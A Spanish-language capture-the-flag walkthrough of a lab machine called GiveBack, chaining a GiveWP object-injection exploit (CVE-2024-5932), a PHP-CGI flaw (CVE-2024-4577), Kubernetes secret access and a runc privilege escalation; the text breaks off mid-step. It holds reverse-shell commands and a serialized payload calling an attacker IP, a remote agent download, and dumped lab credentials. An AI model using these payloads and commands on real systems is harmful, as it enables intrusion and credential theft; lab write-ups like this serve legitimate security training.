GiveBack inicia con la enumeracion de WordPress donde se identifico un plugin vulnerable que permitio el acceso a un pod de Kubernetes. En este ultimo se ejecuto tunneling para el acceso a una nueva pagina. En esta se descubre la version de PHP y la existencia de CGI-PHP, para luego tomar ventaja de una vulnerabilidad para el acceso a un nuevo pod. Dentro, se encontraron credenciales para Kubernetes las cuales permitieron listar secrets que dieron acceso por SSH. Finalmente se escalaron privilegios con la creacion de un contenedor privilegiado con RunC.
❯ wpscan --url http://10.10.11.94/ -e vp,vt,cb,dbe,u --no-banner
[+] URL: http://10.10.11.94/ [10.10.11.94][+] Started: Sat Nov 1 13:11:50 2025Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: nginx/1.28.0
| Found By: Headers (Passive Detection)| Confidence: 100%
[+] robots.txt found: http://10.10.11.94/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)| Confidence: 100%
[+] WordPress readme found: http://10.10.11.94/readme.html
| Found By: Direct Access (Aggressive Detection)| Confidence: 100%
[+] WordPress version 6.8.1 identified (Insecure, released on 2025-04-30).
| Found By: Emoji Settings (Passive Detection)| - http://10.10.11.94/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.8.1'| Confirmed By: Meta Generator (Passive Detection)| - http://10.10.11.94/, Match: 'WordPress 6.8.1'[+] WordPress theme in use: bizberg
| Location: http://10.10.11.94/wp-content/themes/bizberg/
| Latest Version: 4.2.9.79 (up to date)| Last Updated: 2024-06-09T00:00:00.000Z
| Readme: http://10.10.11.94/wp-content/themes/bizberg/readme.txt
| Style URL: http://10.10.11.94/wp-content/themes/bizberg/style.css?ver=6.8.1
| Style Name: Bizberg
| Style URI: https://bizbergthemes.com/downloads/bizberg-lite/
| Description: Bizberg is a perfect theme for your business, corporate, restaurant, ingo, ngo, environment, nature,...
| Author: Bizberg Themes
| Author URI: https://bizbergthemes.com/
|| Found By: Css Style In Homepage (Passive Detection)| Confirmed By: Css Style In 404 Page (Passive Detection)|| Version: 4.2.9.79 (80% confidence)| Found By: Style (Passive Detection)| - http://10.10.11.94/wp-content/themes/bizberg/style.css?ver=6.8.1, Match: 'Version: 4.2.9.79'[+] Enumerating Vulnerable Plugins (via Passive Methods)[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods) Checking Known Locations - Time: 00:02:38 <========================================================================================================> (652 / 652) 100.00% Time: 00:02:38
[+] Checking Theme Versions (via Passive and Aggressive Methods)[i] No themes Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:33 <=========================================================================================================> (137 / 137) 100.00% Time: 00:00:33
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Passive and Aggressive Methods) Checking DB Exports - Time: 00:00:17 <===============================================================================================================> (75 / 75) 100.00% Time: 00:00:17
[i] No DB Exports Found.
[+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:03 <==========================================================================================================> (10 / 10) 100.00% Time: 00:00:03
[i] User(s) Identified:
[+] user
| Found By: Author Posts - Author Pattern (Passive Detection)| Confirmed By:
| Wp Json Api (Aggressive Detection)| - http://10.10.11.94/wp-json/wp/v2/users/?per_page=100&page=1| Oembed API - Author URL (Aggressive Detection)| - http://10.10.11.94/wp-json/oembed/1.0/embed?url=http://10.10.11.94/&format=json
| Author Sitemap (Aggressive Detection)| - http://10.10.11.94/wp-sitemap-users-1.xml
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)| Login Error Messages (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Nov 1 13:15:31 2025[+] Requests Done: 906[+] Cached Requests: 31[+] Data Sent: 234.88 KB
[+] Data Received: 606.596 KB
[+] Memory used: 282.289 MB
[+] Elapsed time: 00:03:40
❯
Nuevamente ejecutamos, pero con la opcion ap para enumerar todos los plugins. Este nos muestra el plugin give version 3.14.0. Encontramos que la vulnerabilidad Unauthenticated PHP Object Injection to RCE afecta a la version de este plugin.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[+] give
| Location: http://giveback.htb/wp-content/plugins/give/
| Last Updated: 2025-12-08T20:09:00.000Z
|[!] The version is out of date, the latest version is 4.13.2
|| Found By: Urls In Homepage (Passive Detection)| Confirmed By:
| Urls In 404 Page (Passive Detection)| Meta Tag (Passive Detection)| Javascript Var (Passive Detection)|| Version: 3.14.0 (100% confidence)| Found By: Query Parameter (Passive Detection)| - http://giveback.htb/wp-content/plugins/give/assets/dist/css/give.css?ver=3.14.0
| Confirmed By:
| Meta Tag (Passive Detection)| - http://giveback.htb/, Match: 'Give v3.14.0'| Javascript Var (Passive Detection)| - http://giveback.htb/, Match: '"1","give_version":"3.14.0","magnific_options"'
root - Kubernetes Pod WordPress
CVE-2024-5932
Clonamos el repositorio del exploit EQSTLab/CVE-2024-5932. Utilizamos el exploit RCE el cual crea y envia el objeto con el comando a ejecutar.
1
2
3
4
5
6
7
8
9
10
11
❯ python3 CVE-2024-5932-rce.py --help
Usage: CVE-2024-5932-rce.py [OPTIONS]╭─ Options ────────────────────────────────────────────────────────────────────────────╮
│ * --url -u TEXT Specify a URL or domain for vulnerability detection │
│ (Donation-Form Page)[required] │
│ --cmd -c TEXT Specify the file to read from the server │
│ --help Show this message and exit. │
╰──────────────────────────────────────────────────────────────────────────────────────╯
❯
❯ python3 CVE-2024-5932-rce.py --url http://giveback.htb/donations/the-things-we-need/ --cmd 'bash -c "bash -i >& /dev/tcp/10.10.14.10/1339 0>&1"' ..-+*******-
.=#+-------=@. .:==:. .**-------=*+: .-=++.-+=:.
+*-------=#=+++++++++=:.. -+:==**=+-+:. .%----=+**+=-:::::::::-=+**+:. ==:=*=-==+=..
:%--**+-::::::::::::::::::::+*=: .::*=**=:.
..-++++*@#+-:::::::::::::::::::::::::-*+. ..-+:.
..+*+---=#+::::::::::::::::::::::::::::::=*:..-==-. .-#=---**:::::::::::::::::::::::::=+++-:::-#:.. :=+++++++==. ..-======-. ..:---:..
..=**#=::::::::::::::::::::::::::::::::::::%:. *@@@@@@@@@@@@:.-#@@@@@@@@@%*:.-*%@@@@@@@%#=.
.=#%=::::::::::::::::::::::::::::::::-::::-#. %@@@@@@@@@@@@+:%@@@@@@@@@@@%==%@@@@@@@@@@@%- .*+*+:::::::::::-=-::::::::::::::::-*#*=::::#: ..*#*+:. =++++***%@@@@+-@@@#====%@@@%==@@@#++++%@@@%-
.+#*-::::::::::+*-::::::::::::::::::+=::::::-#..#+=+*%-. :=====+#@@@@-=@@@+. .%@@@%=+@@@+. .#@@@%-
.+*::::::::::::::::::::::::+*******=::::::--@.+@#+==#-. #@@@@@@@@@@@@.=@@@%*++*%@@@%=+@@@#====@@@@%- .=+:::::::::::::=*+::::::-**=-----=#-::::::-@%+=+*%#:. .@@@@@@@@@@@%=.:%@@@@@@@@@@@#-=%@@@@@@@@@@@#- .=*::::::::::::-+**=::::-#+--------+#:::-::#@%*==+*- .@@@@#=----:. .-+*#%%%%@@@@#-:+#%@@@@@@@@@#-
.-*::::::::::::::::::::=#=---------=#:::::-%+=*#%#-. .@@@@%######*+. .-%@@@#: .....:+@@@@*: :+=:::::::::::-:-::::-%=----------=#:::--%++++=** %@@@@@@@@@@@@. =%@@@#. =@@@@*. .-*-:::::::::::::::::**---------=+#=:::-#**#*+#*. -#%@@@@@@@@@#. -%@@%*. =@@@@+.
.::-==##**-:::-::::::::::%=-----=+***=::::=##+#=.:: ..::----:::. .-=--. .=+=-. %+==--:::=*::::::::::::-:+#**+=**=::::::-#%=:-%.
*+.......+*::::::::::::::::-****-:::::=*=:.++:*=.%:..::::*@@*-::::::::::::::-+=:::-+#%-. .#*#.
++:.....#--#%**=-:::::::::::-+**+=:@#....-+*=.
:#:....:#-::%..-*%#++++++%@@@%*+-.#-=#+++-.. .++....-#:::%. .-*+-..*=.+@= .=+..-#
.:+++#@#-:-#= ... .-++:-%@@= .:#
:+++**##@#+=. -%@@@%- .-=*#.
.=+::+::-@: #@@@@+. :+*=::=*- .=+:-**+%%+=-:.. =*#*-..=*-:::::=*
:++---::--=*#+*+++++**+*+**-::::::+= .+*=:::---+*:::::++++++*+=:::::-*=.
.:=**+====#*::::::=%:...-=++++=. Author: EQST(Experts, Qualified Security Team) ..:----=**++++*+. Github: https://github.com/EQSTLab/CVE-2024-5932
Analysis base : https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/
=============================================================================================================CVE-2024-5932 : GiveWP unauthenticated PHP Object Injection
description: The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files.
Arbitrary File Deletion=============================================================================================================[\] Exploit loading, please wait...
[+] Requested Data:
{'give-form-id': '17', 'give-form-hash': '66e843c3e0', 'give-price-id': '0', 'give-amount': '$10.00', 'give_first': 'Sarah', 'give_last': 'Carroll', 'give_email': 'qcoleman@example.com', 'give_title': 'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:51:"bash -c "bash -i >& /dev/tcp/10.10.14.10/1339 0>&1"";}}s:13:"\\0*\\0maxRetries";i:10;}}}}}}', 'give-gateway': 'offline', 'action': 'give_process_donation'}
Logramos obtener la shell como root.
1
2
3
4
5
6
7
8
9
10
❯ rlwrap nc -lvp 1339listening on [any]1339 ...
connect to [10.10.14.10] from giveback.htb [10.10.11.94]39423bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
<s-95b8ccd68-pd296:/opt/bitnami/wordpress/wp-admin$ whoami;id;pwdwhoami: cannot find name for user ID 1001uid=1001gid=0(root)groups=0(root),1001
/opt/bitnami/wordpress/wp-admin
<s-95b8ccd68-pd296:/opt/bitnami/wordpress/wp-admin$
Credentials
Dentro, encontramos multiples credenciales. En el archivo de configuracion de wordpress.
# export TERM=xtermI have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami/wordpress$ cat wp-config.php | grep -v "*"<?php
define('DB_NAME', 'bitnami_wordpress');define('DB_USER', 'bn_wordpress');define('DB_PASSWORD', 'sW5sp4spa3u7RLyetrekE4oS');define('DB_HOST', 'beta-vino-wp-mariadb:3306');define('DB_CHARSET', 'utf8');define('DB_COLLATE', '');define('AUTH_KEY', 'G7T{pv:!LZWUfekgP{A8TGFoL0,dMEU,&2B)ALoZS[8lo8V~+UGj@kWW%n^.vZgx');define('LOGGED_IN_KEY', 'E5x5$T@Ggpti3+!/0G<>j<ylElF+}#Ny-7XZLw<#j[6|:oel9%OgxG|U}86./&&K');define('NONCE_KEY', 'jM^E^Bx{vf-Ca~2$eXbH%RzD?=VmxWP9Z}-}J1E@N]t`GOP`8;<F;lYmGz8sh7sG');define('AUTH_SALT', '+L>`[0~bk-bRDX 5F?ER)PUnB_ ZWSId=J {5XV:trSTp0u!~6shvPS`VP{f(@_Q');define('LOGGED_IN_SALT', 'i?aJHLYu/rI%@MWZTw%Ch~%h|M/^Wum4$#4;qm(#zgQA+X3gKU?~B)@Mbgy %k}G');# [.. cut ...]I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami/wordpress$
/secrets aloja las credenciales de base de datos y wordpress.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/secrets$ ls -lah
total 4.0K
drwxrwsrwt 3 root 1001140 Nov 1 18:56 .
drwxr-xr-x 1 root root 4.0K Nov 1 19:28 ..
drwxr-sr-x 2 root 1001100 Nov 1 18:56 ..2025_11_01_18_56_41.2742971764
lrwxrwxrwx 1 root 100132 Nov 1 18:56 ..data -> ..2025_11_01_18_56_41.2742971764
lrwxrwxrwx 1 root 100123 Nov 1 18:56 mariadb-password -> ..data/mariadb-password
lrwxrwxrwx 1 root 100128 Nov 1 18:56 mariadb-root-password -> ..data/mariadb-root-password
lrwxrwxrwx 1 root 100125 Nov 1 18:56 wordpress-password -> ..data/wordpress-password
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/secrets$ cat mariadb-password;echosW5sp4spa3u7RLyetrekE4oS
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/secrets$ cat mariadb-root-password;echosW5sp4syetre32828383kE4oS
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/secrets$ cat wordpress-password;echoO8F7KR5zGi
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/secrets$
WordPress Database
Dentro de la base de datos de wordpress encontramos un unico usuario registrado.
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ mariadb -h beta-vino-wp-mariadb -P "3306" -u "bn_wordpress" -p"sW5sp4spa3u7RLyetrekE4oS" bitnami_wordpress -e "show databases;"Database
bitnami_wordpress
information_schema
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ mariadb -h beta-vino-wp-mariadb -P "3306" -u "bn_wordpress" -p"sW5sp4spa3u7RLyetrekE4oS" bitnami_wordpress -e "use bitnami_wordpress;show tables;"Tables_in_bitnami_wordpress
wp_actionscheduler_actions
wp_actionscheduler_claims
wp_actionscheduler_groups
wp_actionscheduler_logs
wp_aioseo_cache
wp_commentmeta
wp_comments
# [... cut ..]wp_options
wp_postmeta
wp_posts
wp_term_relationships
wp_term_taxonomy
wp_termmeta
wp_terms
wp_usermeta
wp_users
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ mariadb -h beta-vino-wp-mariadb -P "3306" -u "bn_wordpress" -p"sW5sp4spa3u7RLyetrekE4oS" bitnami_wordpress -e "use bitnami_wordpress; select * from wp_users;"ID user_login user_pass user_nicename user_email user_url user_registered user_activation_key user_status display_name
1 user $P$Bm1D6gJHKylnyyTeT0oYNGKpib//vP. user user@example.com http://127.0.0.1 2024-09-21 22:18:28 0 babywyrm
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$
WordPress Admin
En /opt/bitnami descubrimos la herramienta wp-cli.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami$ ls -lah
total 44K
drwxr-xr-x 10 root root 4.0K Jun 20 08:14 .
drwxr-xr-x 3 root root 4.0K Jun 20 08:14 ..
-rw-r--r-- 1 root root 814 Jun 20 08:14 .bitnami_components.json
drwxrwxr-x 17 root root 4.0K Jun 20 08:14 apache
lrwxrwxrwx 1 root root 6 Jun 20 08:14 apache2 -> apache
drwxr-xr-x 6 root root 4.0K Jun 2 16:24 common
drwxr-xr-x 2 root root 4.0K Jun 20 08:14 licenses
drwxr-xr-x 6 root root 4.0K Jun 20 08:14 mysql
drwxr-xr-x 13 root root 4.0K Jun 20 08:14 php
drwxr-xr-x 7 root root 4.0K Jun 20 08:14 scripts
drwxrwsr-x 610011001 4.0K Nov 1 19:28 wordpress
drwxr-xr-x 7 root root 4.0K Jun 20 08:14 wp-cli
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami$
WP-CLI 2.12.0
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami$
A traves de esta es posible crear un usuario administrador en wordpress.
1
2
3
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami$ wp user create sckull sckull@giveback.htb --role=administrator --user_pass=5upp3rP455
Success: Created user 2.
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/opt/bitnami$
Esto nos permite ingresar al panel de wordpress. Dentro no encontramos mas informacion relevante.
Intranet
Las variables de entorno indican un ‘servicio’ intranet en el puerto 5000.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ env
# [...]LEGACY_INTRANET_SERVICE_SERVICE_HOST=10.43.2.241
LEGACY_INTRANET_SERVICE_PORT_5000_TCP=tcp://10.43.2.241:5000
KUBERNETES_PORT_443_TCP=tcp://10.43.0.1:443
LEGACY_INTRANET_SERVICE_SERVICE_PORT=5000LEGACY_INTRANET_SERVICE_PORT_5000_TCP_ADDR=10.43.2.241
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_SERVICE_HOST=10.43.0.1
KUBERNETES_PORT=tcp://10.43.0.1:443
KUBERNETES_PORT_443_TCP_PORT=443LEGACY_INTRANET_SERVICE_PORT_5000_TCP_PROTO=tcp
LEGACY_INTRANET_SERVICE_PORT=tcp://10.43.2.241:5000
# [...]I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$
Con php realizamos una solicitud GET a traves de file_get_contents().
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ php -r 'file_put_contents("file", file_get_contents("http://10.43.2.241:5000"));'I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$ cat file
<!DOCTYPE html>
<html>
<head>
<title>GiveBack LLC Internal CMS</title>
<!-- Developer note: phpinfo accessible via debug mode during migration window -->
<style>
body { font-family: Arial, sans-serif; margin: 40px; background: #f9f9f9; } .header { color: #333; border-bottom: 1px solid #ccc; padding-bottom: 10px; } .info { background: #eef; padding: 15px; margin: 20px 0; border-radius: 5px; } .warning { background: #fff3cd; border: 1px solid #ffeeba; padding: 10px; margin: 10px 0; } .resources { margin: 20px 0;} .resources li { margin: 5px 0;} a { color: #007bff; text-decoration: none; } a:hover { text-decoration: underline;} </style>
</head>
<body>
<div class="header">
<h1>🏢 GiveBack LLC Internal CMS System</h1>
<p><em>Development Environment – Internal Use Only</em></p>
</div>
<div class="warning">
<h4>⚠️ Legacy Notice</h4>
<p>**SRE** - This system still includes legacy CGI support. Cluster misconfiguration may likely expose internal scripts.</p>
</div>
<div class="resources">
<h3>Internal Resources</h3>
<ul>
<li><a href="/admin/">/admin/</a> — VPN Required</li>
<li><a href="/backups/">/backups/</a> — VPN Required</li>
<li><a href="/runbooks/">/runbooks/</a> — VPN Required</li>
<li><a href="/legacy-docs/">/legacy-docs/</a> — VPN Required</li>
<li><a href="/debug/">/debug/</a> — Disabled</li>
<li><a href="/cgi-bin/info">/cgi-bin/info</a> — CGI Diagnostics</li>
<li><a href="/cgi-bin/php-cgi">/cgi-bin/php-cgi</a> — PHP-CGI Handler</li>
<li><a href="/phpinfo.php">/phpinfo.php</a></li>
<li><a href="/robots.txt">/robots.txt</a> — Crawlers: Disallowed</li>
</ul>
</div>
<div class="info">
<h3>Developer Note</h3>
<p>This CMS was originally deployed on Windows IIS using <code>php-cgi.exe</code>.
During migration to Linux, the Windows-style CGI handling was retained to ensure
legacy scripts continued to function without modification.</p>
</div>
</body>
</html>
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/dev/shm$
htmledit nos muestra una pagina simple. En esta se indica CGI. Tambien se menciona en un comentario que phpinfo es accesible via debug mode.
Tunneling
Descargamos el agente de ligolo-ng, le dimos permisos y ejecutamos con la flag -ignore-cert.
1
2
3
4
5
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/tmp$ php -r 'file_put_contents("ag", file_get_contents("http://10.10.14.10/agent_linux"));'I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/tmp$ chmod +x ag
I have no name!@beta-vino-wp-wordpress-95b8ccd68-pd296:/tmp$ ./ag -connect 10.10.14.10:443 -ignore-cert
time="2025-11-01T20:47:54Z"level=warning msg="warning, certificate validation disabled"time="2025-11-01T20:47:54Z"level=info msg="Connection established"addr="10.10.14.10:443"
Localmente ejecutamos el proxy con la flag -selfcert. Especificamos la sesion, creamos una interfaz y agregamos las rutas.
Se mencionaba que es posible en modo debug tras agregar ?debug nos permite observar informacion. En este se indica la version php 8.3.3 y el directorio de phpinfo en /var/www/html.
CVE-2024-4577
Tras investigar la version de PHP con cgi-php encontramos que existe una vulnerabilidad RCE (CVE-2024-4577) que afecta a la version 8.3 de PHP principalmente en Windows (Unmasking the new persistent attacks on Japan), sin embargo, en este caso es un sistema linux.
La version 8.3.3 parece estar en el rango de versiones vulnerables 8.3.* < 8.3.8 (CVE-2024-4577 Exploits in the Wild One Day After Disclosure). Enviamos una solicitud como el PoC (1,2,3,4) con la ejecucion de phpinfo(), la respuesta no muestra ningun contenido.
Con ello logramos acceso root en el pod de Intranet.
1
2
3
4
5
6
7
8
9
❯ rlwrap nc -lvp 1335listening on [any]1335 ...
connect to [10.10.14.10] from giveback.htb [10.10.11.94]3321/bin/sh: can't access tty; job control turned off
/var/www/html/cgi-bin # whoami;id;pwdroot
uid=0(root)gid=0(root)groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)/var/www/html/cgi-bin
/var/www/html/cgi-bin #
phpinfo.php indica la ‘proteccion’.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/var/www/html # cat phpinfo.php<?php
// Development phpinfo - Remove in production!
// Last updated: 2024-06-15
if(!isset($_GET['debug'])&&$_SERVER['REMOTE_ADDR'] !=='127.0.0.1'){ // Simple protection, but bypassable
die('Access restricted');}echo"<h1>PHP Configuration - Development Environment</h1>";echo"<p style='color: red;'><strong>WARNING:</strong> This file should not be accessible in production!</p>";echo"<hr>";phpinfo();?>
/var/www/html #
Kubernetes Access
Las variables de entorno nuevamente indican Kubernetes, tambien encontramos las “credenciales” para una cuenta de usuario (Service Accounts).
❯ ssh babywyrm@giveback.htb
The authenticity of host 'giveback.htb (10.10.11.94)' can't be established.
ED25519 key fingerprint is SHA256:QW0UEukNwOzzXzOIYR311JYiuhYUEv8FYbRgwiKZ35g.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'giveback.htb' (ED25519) to the list of known hosts.
babywyrm@giveback.htb's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-124-generic x86_64) * Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat Nov 1 22:45:50 2025 from 10.10.14.10
babywyrm@giveback:~$ whoami;id;pwdbabywyrm
uid=1000(babywyrm)gid=1000(babywyrm)groups=1000(babywyrm),4(adm),30(dip)/home/babywyrm
babywyrm@giveback:~$ ls
user.txt
babywyrm@giveback:~$ cat user.txt
a8da1b9773f7d59fe54085a39e0f079c
babywyrm@giveback:~$
Privesc
El usuario puede ejecutar el comando /opt/debug como root.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
babywyrm@giveback:~$ sudo -l -l
Matching Defaults entries for babywyrm on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, timestamp_timeout=0, timestamp_timeout=20User babywyrm may run the following commands on localhost:
Sudoers entry:
RunAsUsers: ALL
Options: !authenticate
Commands:
!ALL
Sudoers entry:
RunAsUsers: ALL
Commands:
/opt/debug
babywyrm@giveback:~$
El comando necesita una contrasena para su ejecucion.
# c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9Tbabywyrm@giveback:~$ sudo /opt/debug
Validating sudo...
Please enter the administrative password:
Both passwords verified. Executing the command...
NAME:
runc - Open Container Initiative runtime
runc is a command line client for running applications packaged according to
the Open Container Initiative (OCI) format and is a compliant implementation of the
Open Container Initiative specification.
runc integrates well with existing process supervisors to provide a production
container runtime environment for applications. It can be used with your
existing process monitoring tools and the container will be spawned as a
direct child of the process supervisor.
Containers are configured using bundles. A bundle for a container is a directory
that includes a specification file named "config.json" and a root filesystem.
The root filesystem contains the contents of the container.
To start a new instance of a container:
# runc run [ -b bundle ] <container-id>Where "<container-id>" is your name for the instance of the container that you
are starting. The name you provide for the container instance must be unique on
your host. Providing the bundle directory using "-b" is optional. The default
value for"bundle" is the current directory.
USAGE:
runc.amd64.debug [global options]command[command options][arguments...]VERSION:
1.1.11
commit: v1.1.11-0-g4bccb38c
spec: 1.0.2-dev
go: go1.20.12
libseccomp: 2.5.4
COMMANDS:
checkpoint checkpoint a running container
create create a container
delete delete any resources held by the container often used with detached container
events display container events such as OOM notifications, cpu, memory, and IO usage statistics
exec execute new process inside the container
killkill sends the specified signal (default: SIGTERM) to the container's init process
list lists containers started by runc with the given root
pause pause suspends all processes inside the container
ps ps displays the processes running inside a container
restore restore a container from a previous checkpoint
resume resumes all processes that have been previously paused
run create and run a container
spec create a new specification file
start executes the user defined process in a created container
state output the state of a container
update update container resource constraints
features show the enabled features
help, h Shows a list of commands or help for one command
GLOBAL OPTIONS:
--debug enable debug logging
--log value set the log file to write runc logs to (default is '/dev/stderr')
--log-format value set the log format ('text' (default), or 'json') (default: "text")
--root value root directory for storage of container state (this should be located in tmpfs) (default: "/run/runc")
--criu value path to the criu binary used for checkpoint and restore (default: "criu")
--systemd-cgroup enable systemd cgroup support, expects cgroupsPath to be of form "slice:prefix:name" for e.g. "system.slice:runc:434234"
--rootless value ignore cgroup permission errors ('true', 'false', or 'auto')(default: "auto") --help, -h show help --version, -v print the version
babywyrm@giveback:~$
Es posible escalar privilegios con RunC creando un nuevo contenedor, montando la raiz (/) del host. Para ello es necesario crear un archivo de configuracion. Tras ejecutar spec este crearia el archivo config.json.
1
2
3
4
5
6
7
8
9
# c1c1c3A0c3BhM3U3Ukx5ZXRyZWtFNG9Tbabywyrm@giveback:~$ sudo /opt/debug spec
Validating sudo...
Please enter the administrative password:
Both passwords verified. Executing the command...
babywyrm@giveback:~$ ls
config.json user.txt
babywyrm@giveback:~$
Modificamos el archivo json agregando lo siguiente:
